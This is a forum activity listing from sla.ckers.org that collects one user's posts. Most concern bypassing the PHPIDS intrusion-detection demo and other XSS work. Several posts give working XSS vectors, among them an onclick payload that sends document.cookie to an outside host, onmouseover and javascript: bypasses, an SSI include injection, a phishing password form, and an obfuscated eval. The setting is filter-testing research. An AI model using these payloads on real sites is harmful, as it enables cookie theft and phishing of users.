sla.ckers.org is ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 

Current Page: 1 of 3
Results 1 - 30 of 71
6 years ago
kishord
@thornmaker: amazing!
Forum: Projects
7 years ago
kishord
Simply amazing...
Forum: Projects
7 years ago
kishord
Now before anyone else submits a vector, I am submitting mine. DEMO
Forum: Projects
7 years ago
kishord
:D
Forum: Projects
7 years ago
kishord
I have been trying to break IDS for the last couple of days. I was halfway through, and then thornmaker comes up with more vectors, IDS rules become stronger and I have to start again [:D] Unfair, isn't it? ;)
Forum: Projects
7 years ago
kishord
Wow!
Forum: Projects
7 years ago
kishord
There should not be only a . after onWHATEVER (xxtp://phpids.heideri.ch/?test=%23%22+onclick%60=%22location='ht'%2b'tp://google.com/?'%2bdocument.cookie also works). I guess we will need to enumerate all such characters that work. Do you know the list, beford?
Forum: Projects
7 years ago
kishord
beford's vector is still not fixed: hxxp://phpids.heideri.ch/?test=%23%22+onclick%60=%22location='ht'%2b'tp://google.com/?'%2bdocument.cookie onWHATEVER.= may be a better way to go.
Forum: Projects
7 years ago
kishord
http://phpids.heideri.ch/?test=%3Ca%20href=javascript:document.write(123);%3ETest%3C/a%3E I have posted this requirement ('javascript:') on the group as well. Thanks,
Forum: Projects
7 years ago
kishord
@RSnake, Is the semicolon vector a cheat sheet candidate? ;)
Forum: Projects
7 years ago
kishord
Are you all right .mario? http://phpids.heideri.ch/?test=%3Ccode%20onmouseover=;;document.write(123)%3Eabcdefghijk%3C/code%3E two semicolons! against this filter rule: (on\w+\s*=.(\w|("|')))
Forum: Projects
7 years ago
kishord
http://phpids.heideri.ch/?test=%3Ccode%20onmouseover=;document.write(123)%3Eabcdefghijk%3C/code%3E Need to change [\s]*=[\s]* thing. It can be bypassed using onmouseover=;f(); I.e. a ;
Forum: Projects
6 years ago
kishord
Sorry guys I have been away for quite a long time. Currently I am doing an internship and hence getting very little time. I would certainly like to join you after the internship gets over after about two months. (I am not good at PHP though :P )
Forum: Projects
6 years ago
kishord
Does it have to do with greedy matching? E.g. if you have string aaaaaa then a* by default will match the whole string. I am not talking about the regex in your code here. Just check if you have any greedy match in regex.
Forum: Projects
6 years ago
kishord
Nice! I have just uploaded the new file. It now contains a Greasemonkey script. Just install it and load the page containing the first segment in the browser, and it takes care of the rest. So you either install fetch.js and the bookmarklet or you install this GM script.
Forum: Projects
6 years ago
kishord
Yes, it is possible, but we will need e.g. Greasemonkey. I am planning to do that soon. The GM script will detect if there is a segment on the page; if yes, it will do what the bookmarklet does.
Forum: Projects
6 years ago
kishord
@Malkav: your approach sounds interesting to me. But my real intention was to share files among web users. We will need checksums and hashes so that users will get the right data and attackers will not be able to modify intermediate segments. The first segment would typically come from a trusted source and will contain the hash for the whole file.
Forum: Projects
6 years ago
kishord
@fragge Thanks. Filesplit is the utility I used to split the files. You may use something else. As you said, it would be nice to output the segments into the page output. But I was thinking of the following: Split file into segments, append the header and trailer to the last segment.. upload it get the URL(this url is added to the second last segment).. then go to the second last segment...... a
Forum: Projects
6 years ago
kishord
@Malkav: I am finding it a little hard to understand you. Do you mean that we encrypt and then keep doing that so that the key for the n+1st seg is encrypted with the nth segment? By "randomly upping" do you mean that the segments are chained in any random order but the order will be restored after decryption? @Martin: "What about expanding it to attempt to locate pre-existing segments
Forum: Projects
6 years ago
kishord
I just finished a POC for what I call web2torrent. The user uploads binary data segments on blogs, mailing lists etc. All the data is linked to each other. The tools let you retrieve the files by reading the web pages. An example is also included. Here you go
Forum: Projects
6 years ago
kishord
Link If I mark my videos as private, no one except my friends should know what I am watching.
Forum: Privacy
7 years ago
kishord
.
Forum: News and Links
7 years ago
kishord
Hi, I could not do much with this xss. But I think at the least you should be able to construct a phishing page with it. E.g about:blank?<form%20action=http://sla.ckers.org/>Please%20Enter%20Your%20Windows%20Password%20to%20continue:%20<input%20type=password%20name=p></form>
Forum: XSS Info
7 years ago
kishord
Try opening a new window instead of opening a new tab (i.e opening a fresh instance of ie).
Forum: XSS Info
7 years ago
kishord
http://wasjournal.blogspot.com/2007/09/ie-home-page-url-resulting-in-xss.html I am not able to exploit it really. Does anyone have a clue?
Forum: XSS Info
7 years ago
kishord
Some months ago, I had found a very serious hole in yahoo. I did not go the full disclosure way, but let me tell you, you get nothing better than a 'thank you' email.
Forum: XSS Info
7 years ago
kishord
@Ronald, I said, "YOU INJECT" /a.shtml?a=%3C!--%23include%20virtual%3D%22c.txt%22%20--%3E which is a.shtml?a=<!--#include virtual="c.txt" --> I.e. when injecting you use %23 and not #. The plain text was given to make clear what's being injected :)
Forum: XSS Info
7 years ago
kishord
a=alert a(0) This harmless vector is still alive
Forum: XSS Info
7 years ago
kishord
Wow! That was unexpected and I am speechless!
Forum: XSS Info
7 years ago
kishord
@Mario Hi, Here is an explanation of the vector:
evil=/ev/.source+/al/.source //---variable evil now contains string 'eval'
changeProto=/Strin/.source+ /g.prototyp/.source+ /e.ss=/.source+ /Strin/.source+ /g.prototyp/.source+ /e.substrin/.source+ /g/.source; //--- changeProto now contains string 'String.prototype.ss=String.prototype.substring'
// Thus now ss i
Forum: XSS Info